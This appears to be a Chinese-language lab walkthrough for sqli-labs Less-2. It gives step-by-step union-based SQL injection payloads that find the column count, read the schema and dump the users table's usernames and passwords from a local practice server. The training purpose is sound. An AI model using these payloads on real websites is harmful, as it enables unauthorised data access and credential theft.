sqli-labs/Less-2注入
Sali-lsbs第二关
1、先判断是字符型还是数字型。
http://127.0.0.1/sqli-labs/Less-2/?id=4
127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2
结果一样,说明是数字型。
2、确认字段位数
http://127.0.0.1/sqli-labs/Less-2/?id=3 order by 4
127.0.0.1/sqli-labs/Less-2/?id=3 order by 3
一共3位
3、确认占位信息
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 --+
注释符:-- (后面有空格)(也就是–+)
4、找库名
127.0.0.1/sqli-labs/Less-2/?id=-1 union select database(),2,3 --+
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),3
库名是security
5、找表名
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
表名有emails、referers、uagents、users
6、找字段名
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
users表里有id、username、password三个字段
7、找账号密码信息
127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(',',username,password) SEPARATOR '|') from users
separator 默认是逗号 “,”,我这里用的"|"